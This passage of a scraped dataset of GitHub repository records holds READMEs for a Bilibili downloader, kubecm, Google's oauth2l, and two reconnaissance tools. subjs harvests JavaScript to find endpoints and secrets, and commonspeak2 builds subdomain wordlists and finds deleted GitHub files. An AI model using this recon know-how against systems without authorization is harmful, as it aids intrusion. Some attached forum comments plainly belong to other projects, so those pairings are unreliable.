environment\n\n1. Install the Golang compilation environment\n* Ubuntu\n```shell\nsudo apt install golang\n```\n\n1.1 If you are in mainland China, there is a high probability that you may need to configure a proxy to proceed to the next step.\n```shell\ngo env -w GO111MODULE=on #Enable Go Moledules\ngo env -w GOPROXY=https://goproxy.io #Use official proxy\n```\n\n2. 
Run FastestBibiliDownloader once\nThe program entry is in **cmd/start-concurrent-engine.go**, only need\n```shell\ngo run cmd/start-concurrent-engine.go -t (aid/bvid/upid) -v (id)\n```\nThe first run will take time to download a lot of stuff, and then just follow the prompts.\nNote that merging videos requires the support of FFmpeg. Otherwise, it will only download and not automatically merge. Please consult the search engine for the installation tutorial of FFmpeg.\n\n3. Compile FastestBibiliDownloader\n```shell\ngo build cmd/start-concurrent-engine.go -t (aid/bvid/upid) -v (id)\n```\nThen run ./start-concurrent-engine directly.\n\n#### If you do not have a Golang compilation environment, or do not have a FFmeg environment. Then it is recommended to run in docker mode. The dockefile and makefile have been written. You just need:\n\n ```shell\n $ cd FastestBilibiliDownloader\n $ make build #Download image\n $ make run #run the image\n ```\n\n \n\n#### The bin file will be packaged to the release when there is time later.\n\n### grateful\n\n1. The frame reference of the engine part **ccmouse**I have adjusted the overall structure part later, thank you very much.\n2. [bilibili-downloader](https://github.com/stevenjoezhang/bilibili-downloader): The API for requesting videos at station b is obtained from this code, and the py code comments are also very clear and very grateful.\n3. @sshwy helps to catch bugs and correct errors\n4. @justin201802 took the trouble to help modify\n\n>Welcome to mention pr or fork or whatever, if it can help you, welcome to star! The product of the boring time spent at home during the epidemic, it is a bit rough, everyone is welcome to improve~", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "lc/subjs", "link": "https://github.com/lc/subjs", "tags": [], "stars": 544, "description": "Fetches javascript file from a list of URLS or subdomains.", "lang": "Go", "repo_lang": "", "readme": "# subjs\r\n[![License](https://img.shields.io/badge/license-MIT-_red.svg)](https://opensource.org/licenses/MIT)\r\n[![Go ReportCard](https://goreportcard.com/badge/github.com/lc/gau)](https://goreportcard.com/report/github.com/lc/subjs)\r\n\r\nsubjs fetches javascript files from a list of URLS or subdomains. 
Analyzing javascript files can help you find undocumented endpoints, secrets, and more.\r\n\r\nIt's recommended to pair this with [gau](https://github.com/lc/gau) and then [https://github.com/GerbenJavado/LinkFinder](https://github.com/GerbenJavado/LinkFinder)\r\n\r\n# Resources\r\n- [Usage](#usage)\r\n- [Installation](#installation)\r\n\r\n## Usage:\r\nExamples:\r\n```bash\r\n$ cat urls.txt | subjs \r\n$ subjs -i urls.txt\r\n$ cat hosts.txt | gau | subjs\r\n```\r\n\r\nTo display the help for the tool use the `-h` flag:\r\n\r\n```bash\r\n$ subjs -h\r\n```\r\n\r\n| Flag | Description | Example |\r\n|------|-------------|---------|\r\n| `-c` | Number of concurrent workers | `subjs -c 40` |\r\n| `-i` | Input file containing URLS | `subjs -i urls.txt` |\r\n| `-t` | Timeout (in seconds) for http client (default 15) | `subjs -t 20` |\r\n| `-ua` | User-Agent to send in requests | `subjs -ua \"Chrome...\"` |\r\n| `-version` | Show version number | `subjs -version\"` |\r\n\r\n\r\n## Installation\r\n### From Source:\r\n\r\n```\r\n$ GO111MODULE=on go get -u -v github.com/lc/subjs@latest\r\n```\r\n\r\n### From Binary\r\nYou can download the pre-built [binaries](https://github.com/lc/subjs/releases/) from the releases page and then move them into your $PATH.\r\n\r\n```\r\n$ tar xvf subjs_1.0.0_linux_amd64.tar.gz\r\n$ mv subjs /usr/bin/subjs\r\n```\r\n\r\n## Useful?\r\n\r\n\"Buy\r\n", "readme_type": "markdown", "hn_comments": "Tomte: you've submitted this numerous times.Any specific discussion you're hoping to spark?project-based / depth first learning is a better approach; you will simply implement what you need to from the platonic algorithms rather than mindlessly go through the tasks", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "sunny0826/kubecm", "link": "https://github.com/sunny0826/kubecm", "tags": ["kubeconfig", "kubeconfig-manager", "kubernetes", "switch-namespace", "golang", "cli", "go"], "stars": 544, "description": "Manage your kubeconfig more easily.", "lang": "Go", "repo_lang": "", "readme": "

\n \"Kubecm\"\n

\n\n![Go version](https://img.shields.io/github/go-mod/go-version/sunny0826/kubecm)\n![Go](https://github.com/sunny0826/kubecm/workflows/Go/badge.svg?branch=master)\n[![Go Report Card](https://goreportcard.com/badge/github.com/sunny0826/kubecm)](https://goreportcard.com/report/github.com/sunny0826/kubecm)\n![GitHub](https://img.shields.io/github/license/sunny0826/kubecm.svg)\n[![GitHub release](https://img.shields.io/github/release/sunny0826/kubecm)](https://github.com/sunny0826/kubecm/releases)\n[![codecov](https://codecov.io/gh/sunny0826/kubecm/branch/master/graph/badge.svg?token=KGTLBQ8HYZ)](https://codecov.io/gh/sunny0826/kubecm)\n[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/6065/badge)](https://bestpractices.coreinfrastructure.org/projects/6065)\n\n```text\n \n Manage your kubeconfig more easily. \n \n\n\u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2588 \u2588\u2588\u2588 \n\u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588\u2588\u2588 \u2588\u2588\u2588\u2588 \n\u2588\u2588\u2588\u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2588\u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588\u2588\u2588 \u2588\u2588 \n\u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \n\u2588\u2588 \u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588 \u2588\u2588\n\n Tips Find more information at: https://kubecm.cloud\n\nUsage:\n kubecm [command]\n\nAvailable Commands:\n add Add KubeConfig to $HOME/.kube/config\n alias Generate alias for all contexts\n clear Clear lapsed context, cluster and user\n cloud Manage kubeconfig from cloud\n completion Generate completion script\n create Create new KubeConfig(experiment)\n delete Delete the specified context from the kubeconfig\n help Help about any command\n list List KubeConfig\n merge Merge multiple kubeconfig files into one\n namespace Switch or change namespace interactively\n rename Rename the contexts of kubeconfig\n switch Switch Kube Context interactively\n version Print version info\n\nFlags:\n --config string path of kubeconfig (default \"$HOME/.kube/config\")\n -h, --help help for kubecm\n --ui-size int number of list items to show in menu at once (default 4)\n\nUse \"kubecm [command] --help\" for more information about a command.\n```\n\n## Documentation\n\nFor full documentation, please visit the KubeCM website: [https://kubecm.cloud](https://kubecm.cloud)\n\n## Demo\n\n[![asciicast](https://asciinema.org/a/389595.svg)](https://asciinema.org/a/389595)\n\n## Install\nUsing [Krew](https://krew.sigs.k8s.io/):\n\n```bash\nkubectl krew install kc\n```\n\nUsing Homebrew:\n\n```bash\nbrew install kubecm\n```\n\nSource binary:\n\n[Download the binary](https://github.com/sunny0826/kubecm/releases)\n\n## Contribute\n\nFeel free to open issues and pull requests. Any feedback is highly appreciated!\n\n## Star History\n\n[![Star History Chart](https://api.star-history.com/svg?repos=sunny0826/kubecm&type=Date)](https://star-history.com/#sunny0826/kubecm)\n\n\n## Thanks\n\n- [JetBrains IDEs](https://www.jetbrains.com/?from=kubecm)\n\n

\n \n \"JetBrains\n \n

\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "google/oauth2l", "link": "https://github.com/google/oauth2l", "tags": [], "stars": 543, "description": "oauth2l (\"oauth tool\") is a simple CLI for interacting with Google API authentication.", "lang": "Go", "repo_lang": "", "readme": "## oauth2l\n\n`oauth2l` (pronounced \"oauth tool\") is a simple command-line tool for\nworking with\n[Google OAuth 2.0](https://developers.google.com/identity/protocols/OAuth2)\nwritten in Go. Its primary use is to fetch and print OAuth 2.0 access\ntokens, which can be used with other command-line tools and shell scripts.\n\n## Overview\n\n`oauth2l` supports all Google OAuth 2.0 authentication flows for both user\naccounts and service accounts in different environments:\n\n- When running inside Google Compute Engine (GCE) and Google Kubernetes\n Engine (GKE), it uses the credentials of the current service account\n if it is available.\n\n- When running inside user context that has an active Google Cloud SDK\n (gcloud) session, it uses the current gcloud credentials.\n\n- When running with command option `--credentials xxx`, where `xxx` points to\n a JSON credential file downloaded from\n [Google Cloud Console](https://console.cloud.google.com/apis/credentials),\n `oauth2l` uses the file to start an OAuth session. The file can be\n either a service account key or an OAuth client ID.\n\n- When running with command option `--type jwt --audience xxx` and a service\n account key, a JWT token signed by the service account key will be generated.\n\n- When running with command option `--type sso --email xxx`, `oauth2l` invokes\n an external `sso` command to retrieve Single Sign-on (SSO) access token.\n\n- By default, retrieved tokens will be cached and stored in \"~/.oauth2l\".\n The cache location can be overridden via `--cache xxx`. To disable\n caching, set cache location to empty (\"\").\n\n## Quickstart\n\n### Pre-compiled binaries\n\nPre-built binaries are available for Darwin (Mac OS X), Linux, and Windows. You\ncan download a build for any tag, for example:\n\n| OS | Link |\n| ------- | --------------------------------------------------------------- |\n| Darwin | https://storage.googleapis.com/oauth2l/latest/darwin_amd64.tgz |\n| Linux | https://storage.googleapis.com/oauth2l/latest/linux_amd64.tgz |\n| Windows | https://storage.googleapis.com/oauth2l/latest/windows_amd64.tgz |\n\nSubstitute \"latest\" for any tag version you'd like, removing any leading \"v\"\nprefix.\n\n### Homebrew (Mac OS X)\n\nOn Mac OS X, you can install `oauth2l` via [Homebrew](https://brew.sh):\n\n```bash\n$ brew install oauth2l\n```\n\nNote that new releases may not be immediately available via Homebrew because\nupdating is a manual process.\n\n### Docker\n\nAn official Docker image is available at:\n\n```text\ngcr.io/oauth2l/oauth2l\n```\n\nYou can run this directly:\n\n```sh\n$ docker run -it gcr.io/oauth2l/oauth2l header cloud-platform\n```\n\nOr use it to inject into an existing container:\n\n```dockerfile\nFROM my-awesome-container\nCOPY --from gcr.io/oauth2l/oauth2l /bin/oauth2l /bin/oauth2l\n```\n\nLike the binary releases, the container images are tagged to match the\nrepository tags (without the leading \"v\"). 
For master builds, use the \"latest\"\ntag.\n\n### Everywhere else\n\nOn other systems, you need to meet the following requirements to use this tool:\n\n**Minimum requirements:**\n\n- The tool is only available for _Linux_ or _Mac_\n- _Go 1.10.3_ or higher\n\n**Nice to have:**\n\n- Add your _\\$GOPATH/bin_ into your _\\$PATH_ ([instructions](https://github.com/golang/go/wiki/GOPATH))\n\n```bash\n# Get the package from Github\n$ git clone https://github.com/google/oauth2l\n$ cd oauth2l\n\n# Install the package into your $GOPATH/bin/\n$ make dev\n\n# Fetch the access token from your credentials with cloud-platform scope\n$ ~/go/bin/oauth2l fetch --credentials ~/your_credentials.json --scope cloud-platform\n\n# Or you can run if you $GOPATH/bin is already in your $PATH\n$ oauth2l fetch --credentials ~/your_credentials.json --scope cloud-platform\n```\n\n## Commands\n\n### fetch\n\nFetch and print an access token for the specified OAuth scopes. For example,\nthe following command prints access token for the following OAuth2 scopes:\n\n- https://www.googleapis.com/auth/userinfo.email\n- https://www.googleapis.com/auth/cloud-platform\n\n```bash\n$ oauth2l fetch --scope userinfo.email,cloud-platform\nya29.zyxwvutsrqpnmolkjihgfedcba\n```\n\n### header\n\nThe same as `fetch`, except the output is in HTTP header format:\n\n```bash\n$ oauth2l header --scope cloud-platform\nAuthorization: Bearer ya29.zyxwvutsrqpnmolkjihgfedcba\n```\n\nThe `header` command is designed to be easy to use with the `curl` CLI. For\nexample, the following command uses the PubSub API to list all PubSub topics.\n\n```bash\n$ curl -H \"$(oauth2l header --scope pubsub)\" https://pubsub.googleapis.com/v1/projects/my-project-id/topics\n```\n\nTo send an API request using domain-wide delegation (DwD), for example, to\nlist `user@example.com`'s Gmail labels:\n\n```bash\n$ curl -H \"$(oauth2l header --email user@example.com --credentials service_account_credentials.json --scope https://www.googleapis.com/auth/gmail.labels)\" https://gmail.googleapis.com/gmail/v1/users/me/labels\n```\n\n### curl\n\nThis is a shortcut command that fetches an access token for the specified OAuth\nscopes and uses the token to make a curl request (via 'usr/bin/curl' by\ndefault). Additional flags after \"--\" will be treated as curl flags.\n\n```bash\n$ oauth2l curl --scope cloud-platform,pubsub --url https://pubsub.googleapis.com/v1/projects/my-project-id/topics -- -i\n```\n\nTo send an API request using domain-wide delegation (DwD), for example, to\nlist `user@example.com`'s Gmail labels:\n\n```bash\n$ oauth2l curl --email user@example.com --credentials service_account_credentials.json --scope https://www.googleapis.com/auth/gmail.labels --url https://gmail.googleapis.com/gmail/v1/users/me/labels\n```\n\n\n### info\n\nPrint information about a valid token. This always includes the list of scopes\nand expiration time. If the token has either the\n`https://www.googleapis.com/auth/userinfo.email` or\n`https://www.googleapis.com/auth/plus.me` scope, it also prints the email\naddress of the authenticated identity.\n\n```bash\n$ oauth2l info --token $(oauth2l fetch --scope pubsub)\n{\n \"expires_in\": 3599,\n \"scope\": \"https://www.googleapis.com/auth/pubsub\",\n \"email\": \"user@gmail.com\"\n ...\n}\n```\n\n### test\n\nTest a token. This sets an exit code of 0 for a valid token and 1 otherwise,\nwhich can be useful in shell pipelines. 
It also prints the exit code.\n\n```bash\n$ oauth2l test --token ya29.zyxwvutsrqpnmolkjihgfedcba\n0\n$ echo $?\n0\n$ oauth2l test --token ya29.justkiddingmadethisoneup\n1\n$ echo $?\n1\n```\n\n### reset\n\nReset all tokens cached locally. We cache previously retrieved tokens in the\nfile `~/.oauth2l` by default.\n\n```bash\n$ oauth2l reset\n```\n\n### web\n\nLocally deploys and launches the OAuth2l Playground web application in a browser. If the web application packages are not yet installed, it will be installed under `~/.oauth2l-web` by default. See Command Options section for all supported options for the web command.\n\nNote that a local installation of Docker and docker-compose tool is required in order to support this feature. For most platforms, Docker can be installed by following the instructions [here](https://docs.docker.com/get-docker/). For Google workstations, follow special installation procedures at \"go/installdocker\". The web feature is currently experimental and will be improved in the future.\n\n```bash\n$ oauth2l web\n```\n\n## Command Options\n\n### --help\n\nPrints help messages for the main program or a specific command.\n\n```bash\n$ oauth2l --help\n```\n\n```bash\n$ oauth2l fetch --help\n```\n\n### --credentials\n\nSpecifies an OAuth credential file (either an OAuth client ID or a Service\nAccount key) to start the OAuth flow. You can download the file from\n[Google Cloud Console](https://console.cloud.google.com/apis/credentials).\n\n```bash\n$ oauth2l fetch --credentials ~/service_account.json --scope cloud-platform\n```\n\nIf this option is not supplied, it will be read from the environment variable\nGOOGLE_APPLICATION_CREDENTIALS. For more information, please read\n[Getting started with Authentication](https://cloud.google.com/docs/authentication/getting-started).\n\n```bash\n$ export GOOGLE_APPLICATION_CREDENTIALS=\"~/service_account.json\"\n$ oauth2l fetch --scope cloud-platform\n```\n\nWhen using an OAuth client ID file, the following applies: \n \nIf the first `redirect_uris` in the `--credentials client_id.json` is set to `urn:ietf:wg:oauth:2.0:oob`,\nthe 3LO out of band flow is activated. NOTE: 3LO out of band flow has been deprecated and will stop working entirely in Oct 2022.\n\nIf the first `redirect_uris` in the `--credentials client_id.json` is set to `http://localhost[:PORT]`,\nthe 3LO loopback flow is activated. When the port is omitted, an available port will be used to spin up the localhost.\nWhen a port is provided, oauth2l will attempt to use such port. If the port cannot be used, oauth2l will stop. \n\n### --type\n\nThe authentication type. The currently supported types are \"oauth\", \"jwt\", or\n\"sso\". Defaults to \"oauth\".\n\n#### oauth\n\nWhen oauth is selected, the tool will fetch an OAuth access token through one\nof two different flows. If service account key is provided, 2-legged OAuth flow\nis performed. If OAuth Client ID is provided, 3-legged OAuth flow is performed,\nwhich requires user consent. Learn about the different types of OAuth\n[here](https://developers.google.com/identity/protocols/OAuth2).\n\n```bash\n$ oauth2l fetch --type oauth --credentials ~/client_credentials.json --scope cloud-platform\n```\n\n#### jwt\n\nWhen jwt is selected and the json file specified in the `--credentials` option\nis a service account key file, a JWT token signed by the service account private\nkey will be generated. Either `--audience` or `--scope` must be specified for\nthis option. 
See how to construct the audience [here](https://developers.google.com/identity/protocols/OAuth2ServiceAccount#jwt-auth).\n\n- With audience:\n ```bash\n $ oauth2l fetch --type jwt --credentials ~/service_account.json --audience https://pubsub.googleapis.com/\n ```\n\n- With scope:\n ```bash\n $ oauth2l fetch --type jwt --credentials ~/service_account.json --scope cloud-platform\n ```\n\n#### sso\n\nWhen sso is selected, the tool will use an external Single Sign-on (SSO)\nCLI to fetch an OAuth access token. The default SSO CLI only works with\nGoogle's corporate SSO. An email is required in addition to scope.\n\nTo use oauth2l with the default SSO CLI:\n\n```bash\n$ oauth2l header --type sso --email me@google.com --scope cloud-platform\n```\n\nTo use oauth2l with a custom SSO CLI:\n\n```bash\n$ oauth2l header --type sso --ssocli /usr/bin/sso --email me@google.com --scope cloud-platform\n```\n\nNote: The custom SSO CLI should have the following interface:\n\n```bash\n$ /usr/bin/sso me@example.com scope1 scope2\n```\n\n### --scope\n\nThe scope(s) that will be authorized by the OAuth access token. Required for\noauth and sso authentication types. When using multiple scopes, provide the\nthe parameter as a comma-delimited list and do not include spaces. (Alternatively,\nmultiple scopes can be specified as a space-delimited string surrounded in quotes.)\n\n```bash\n$ oauth2l fetch --scope cloud-platform,pubsub\n```\n\n### --sts\n\nIf true, exchanges the fetched access token with an STS token using Google's\nSecure Token Service. You may optionally specify claims to be embedded into\nthe STS token. The currently supported STS claims are \"audience\" and \"quota_project\".\n\nThis option is compatible with oauth and sso authentication types,\nbut is currently incompatible with jwt.\n\n```bash\n$ oauth2l fetch --sts --audience https://pubsub.googleapis.com/ --quota_project quotaprojectid\n```\n\n### --audience\n\nThe single audience to include in the signed JWT token. Required for jwt\nauthentication type. Can also be used for STS.\n\n```bash\n$ oauth2l fetch --type jwt --audience https://pubsub.googleapis.com/\n```\n\n### --quota_project\n\nThe quota project to include in the STS claim. Used for quota and billing override.\n\n```bash\n$ oauth2l fetch --sts --quota_project quotaprojectid\n```\n\n### --email\n\nThe email associated with SSO. Required for sso authentication type.\n\n```bash\n$ oauth2l fetch --type sso --email me@google.com --scope cloud-platform\n```\n\nThe email parameter can be also used to specify a user email account for domain-wide\ndelegation when authenticating with Service Account credentials.\n\n```bash\n$ oauth2l fetch --credentials ~/service_account.json --scope cloud-platform --email user@google.com\n```\n\n### --ssocli\n\nPath to SSO CLI. For optional use with \"sso\" authentication type.\n\n```bash\n$ oauth2l fetch --type sso --ssocli /usr/bin/sso --email me@google.com --scope cloud-platform\n```\n\n### --cache\n\nPath to token cache file. Disables caching if set to empty (\"\"). 
Defaults to ~/.oauth2l if not configured.\n\n```bash\n$ oauth2l fetch --cache ~/different_path/.oauth2l --scope cloud-platform\n```\n\n### --refresh\n\nIf true, attempt to refresh expired access token (from the cache) using refresh token instead of re-authorizing.\n\n```bash\n$ oauth2l fetch --credentials ~/client_credentials.json --scope cloud-platform --refresh\n```\n\n### --impersonate-service-account\n\nIf specified, exchanges the fetched User access token with a Service Account access token using Google's\nIAM Service. The Service Account parameter can be specified as an ID or an email. Note that at least\none of \"cloud-platform\" or \"iam\" must be included in the scope parameter. Learn more about Service Account\nImpersonation [here](https://cloud.google.com/iam/docs/impersonating-service-accounts).\n\n```bash\n$ oauth2l fetch --credentials ~/client_credentials.json --scope cloud-platform,pubsub --impersonate-service-account 113258942105700140798\n```\n\n### --disableAutoOpenConsentPage\n\nDisables the feature to automatically open the consent page in 3LO loopback flows.\nWhen this option is used, the user will be provided with a URL to manually interact with the consent page.\nThis flag does not take any arguments. Simply add the option to disable this feature.\n\n```bash\n$ oauth2l fetch --credentials ~/client_credentials.json --disableAutoOpenConsentPage --consentPageInteractionTimeout 60 --consentPageInteractionTimeoutUnits seconds --scope cloud-platform\n```\n\n### --consentPageInteractionTimeout\n\nAmount of time to wait for a user to interact with the consent page in 3LO loopback flows.\nOnce the time has lapsed, the localhost at the `redirect_uri` will no longer be available. \nIts default value is 2. See `--consentPageInteractionTimeoutUnits` to change the units.\n\n### --consentPageInteractionTimeoutUnits\n\nUnits of measurement to use when `--consentPageInteractionTimeout` is set.\nIts default value is `minutes`. Valid inputs are `seconds` and `minutes`.\nThis option only affects 3LO loopback flows.\n\n### fetch --output_format\n\nToken's output format for \"fetch\" command. One of bare, header, json, json_compact, pretty, or refresh_token. Default is bare.\n\n```bash\n$ oauth2l fetch --output_format pretty --scope cloud-platform\n```\n\n### curl --url\n\nURL endpoint for curl request. Required for \"curl\" command.\n\n```bash\n$ oauth2l curl --scope cloud-platform --url https://pubsub.googleapis.com/v1/projects/my-project-id/topics\n```\n\n### curl --curlcli\n\nPath to curl CLI. For optional use with \"curl\" command.\n\n```bash\n$ oauth2l curl --curlcli /usr/bin/curl --type sso --email me@google.com --scope cloud-platform --url https://pubsub.googleapis.com/v1/projects/my-project-id/topics\n```\n\n### web --stop\n\nStops the OAuth2l Playground web app.\n\n```bash\n$ oauth2l web --stop\n```\n\n### web --directory\n\nInstalls OAuth2l-web packages to a specfic directory. If this option is used, it should be provided again for future executions of the web command, such as stopping and restarting the web app.\n\n```\n$ oauth2l web --directory your/new/directory\n```\n\n## Previous Version\n\nThe previous version of `oauth2l` was written in Python and it is located\nat the [python](/python) directory. The Python version is deprecated because\nit depends on a legacy auth library and contains some features that are\nno longer best practice. 
Please switch to use the Go version instead.\n", "readme_type": "markdown", "hn_comments": "Authorizer made it to Alternativeto: https://alternativeto.net/software/authorizer-authentication...Give it a heart, add some supporting comments, and recommend it as an alternativeI received a warning messages from Google a couple of days ago.\nGMail is no longer supporting password-based login or special privileges for third-party apps. If your email client wants to access your GMail account, it must support OAuth2, so that it can use Google's own authentication service. For example, Mozilla Thunderbird works just fine (I tested it); I read that the latest versions of MS Outlook are also fine. \nFor me, this is a high motivation to get rid of my GMail accounts, and move to some real, privacy-friendly email provider.How would you say your service stacks up against something like TailScale (https://tailscale.com/), which seems to solve the same problems but with end-to-end encryption and without the need to setup separate OAuth2 proxies? Where does ShareWith really shine and make things more easy/fast/secure/scalable/better than competitive solutions?This could spare certain engineers so many Slack conversations.Any plans on making something like a Helm chart to deploy to Kubernetes easily?Very cool! Excited to give this a try and see what else you guys come out with. - Louis.Super cool. I've been waiting for someone to pick up Zanzibar since the paper came out!What are your plans for surfacing the policy relations to developers?Is this similar to Cloudflare Access but with a better developer experience?Congrats for launching!\nYou should really simplify the process, because right now after reading your quickstart it seems more complicated to use this compared to implementing a basic auth system inside the appThis is cool. Was trying to deploy something with just private / internal access recently. It'd be cool if the steps could be simplified. Seems like currently I'd need to configure Oauth2proxy. How can I go from a locally running server with no auth protection to deploy in as few steps as possible? Right now I'd need to add an Oauth2proxy layer. I'm sure I could do it in a few hours... can it be entirely eliminated?This looks great!How is revocation handled? Will a proxy using sharewith as an oidc provider hit the authz graph on every request?Looks great! Well done jake, joey, jimmySince you mentioned Google docs style sharing, does Sharewith support abilities for different users eg viewer vs commenter vs editor?How does this compare to AWS Cognito?Nice, this is like an open-source Firebase Authentication. I was wondering whether such a solution existed because, even as Firebase Auth is free for unlimited users, it still is a hosted service whose terms could change at any time.This is wonderful.If a passwordless option was available too, i.e. email a TOTP code that is a nonce, and presentation of the TOTP would generate a JWT with the email address as the claim... then this would become my new login manager.I'm presently using auth0 free plan. Which is nice, but passwordless lock (their JS library) is old, and their docs are not great as to how to update to their other lock library (I've concluded you can't stay passwordless with the main auth0 lock library).I'm a bit surprised the project is called loginsrv, yet the example buttons say \"Sign in with X\" instead of \"Log in with X\". 
I thought the UX world had more or less consolidated around 'Log in' and 'Sign up', to make the two options as visually distinct at a glance as possible.How do Oauth2 providers like Google and Github handle password resets or stale data with JWT tokens? Curious because I was trying to implement JWT for auth, but might switch to sessions now.Awesome! Are there any other open source microservices fulfilling similar purposes? I've been looking all over the place. I decided to go with keycloak and keycloak-gatekeeper after failing to find anything less heavy weight.This looks brilliant. I could see loginsrv as a drop-in replacement for SaaS product offering the same functionality, like Xsolla.Looks cool. FYI, the \"sign in with google\" button breaks the google branding guidelines [0]. You must use the colored G logo and it must be on a white background.[0] https://developers.google.com/identity/branding-guidelinesI was looking through the examples, it seems like there isn't a way to use this out-of-the-box with an API service that does \"/login\" and \"/signup\" by password hash and compare:- Htpasswd (Dedicated credentials file)- Simple (user/password pairs by configuration)- Httpupstream (HTTP API Basic auth configuration)It mentions \"OSIAM\" which I'm not familiar with.Is there a way to use this to \"enhance\" a basic JWT auth server implementation that does a bcrypt/Argon2 hash or hash comparison on password with these social-sign-on OAuth providers?Or any similar library, that would be really useful.Mmmm, it\u2019s uses JWT. That went out the window, for me.My checklist:\nhttps://egbert.net/blog/articles/authentication-for-api.htmlwould always recommend the standard id_token form for any authentication JWTs https://openid.net/specs/openid-connect-core-1_0.html#IDToke...Will it support LDAP in the near future?yea would be awesome if you could put it in a cloudflare workerOnce you embrace censorship your legitamacy is gone.Two words: lock-in.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "assetnote/commonspeak2", "link": "https://github.com/assetnote/commonspeak2", "tags": [], "stars": 543, "description": "Leverages publicly available datasets from Google BigQuery to generate content discovery and subdomain wordlists", "lang": "Go", "repo_lang": "", "readme": "Commonspeak2\n---\n\nCommonspeak2 leverages publicly available datasets from Google BigQuery to generate content discovery and subdomain wordlists.\n\nAs these datasets are updated on a regular basis, the wordlists generated via Commonspeak2 reflect the current technologies used on the web.\n\nBy using the Golang client for BigQuery, we can stream the data and process it very quickly. The future of this project will revolve around improving the quality of wordlists generated by creating automated filters and substitution functions.\n\nLet's turn creating wordlists from a manual task, into a reproducible and reliable science with BigQuery.\n\n\nI just want the wordlists...\n----\nWe will update [wordlists.assetnote.io](https://wordlists.assetnote.io) website with any wordlists generated the Commonspeak2 tool.\n\nWordlists are automatically generated at the end of each month and uploaded to this site. 
Further details here: https://github.com/assetnote/wordlists\n\n\nInstructions & Usage\n----\n\nIf you're compiling or running Commonspeak2 from source:\n\n* [Golang 1.10 or above](https://storage.googleapis.com/golang/getgo/installer_linux)\n* [Glide](https://github.com/Masterminds/glide)\n* [Google Cloud Service Account with access to BigQuery](https://cloud.google.com/bigquery/docs/reference/libraries#client-libraries-install-go)\n\nIf you're using the pre-built binaries:\n\n* Download the newest release [here](https://github.com/assetnote/commonspeak2/releases)\n\nUpon completing the above steps, Commonspeak2 can be used in the following ways:\n\n### Subdomains\n\nCurrently subdomains are extracted from HackerNews and HTTPArchive's latest scans. Unlike the previous revision of Commonspeak, the datasets and queries have been optimised to contain valid data that occurs often in the wild. \n\n`\u27e9 ./commonspeak2 --project crunchbox-160315 --credentials credentials.json subdomains -o subdomains.txt`\n\n```\nINFO[0000] Generated SQL template for HackerNews. Mode=Subdomains\nINFO[0000] Generated SQL template for HTTPArchive. Mode=Subdomains\nINFO[0000] Executing BigQuery SQL... this could take some time. Mode=Subdomains Source=hackernews\nINFO[0019] Total rows extracted 71415. Mode=Subdomains Silent=false Source=hackernews Verbose=false\nINFO[0019] Executing BigQuery SQL... this could take some time. Mode=Subdomains Source=httparchive\nINFO[0075] Total rows extracted 484701. Mode=Subdomains Silent=false Source=httparchive Verbose=false\n```\n\n### Words with extensions\n\nUsing a single query on GitHub's dataset, we can extract every path filtered by file extension. This can be done with:\n\n`\u27e9 ./commonspeak2 --project crunchbox-160315 --credentials credentials.json ext-wordlist -e jsp -l 100000 -o jsp.txt`\n\n\n```\nINFO[0000] Executing BigQuery SQL... this could take some time. Extensions=jsp Limit=100000 Mode=WordsWithExt Source=Github\nINFO[0013] Total rows extracted 100000. Mode=WordsWithExt Source=Github\n```\n\nAny set of extensions can be passed via the `-e` flag, i.e. `-e aspx,php,html,js`.\n\n### Deleted files\n\n*Contributed by [mhmdiaa](https://twitter.com/mhmdiaa)*\n\nUsing GitHub's commits dataset, we can extract what may be files that developers decided to delete from their public repositories. These files may contain sensitive data. This can be done with:\n\n`\u27e9 ./commonspeak2 --project crunchbox-160315 --credentials credentials.json deleted-files -l 50000 -o deleted.txt`\n\n\n```\nINFO[0000] Executing BigQuery SQL... this could take some time. Limit=50000 Mode=DeletedFiles Source=Github\nINFO[0013] Total rows extracted 50000. Mode=DeletedFiles Source=Github\n```\n\n\n### Features in Active Development\n\nFeel free to send pull requests to complete the features below, add datasets or improve the architecture of this project. Thank you!\n\n**Routes Based Extraction**\n\nWe can create SQL statements that cover routing patterns in almost any web framework. For now we support the following web frameworks to extract path's from:\n\n- Rails [working implementation \u2705]\n- NodeJS [to be implemented \u274e]\n- Tomcat [to be implemented \u274e]\n\nThis data can be extracted using the following command:\n\n`\u27e9 ./commonspeak2 --project crunchbox-160315 --credentials credentials.json routes --frameworks rails -l 100000 -o rails-routes.txt`\n\nWARNING: running the above query will cost you **lots** of money (over $20 per framework). 
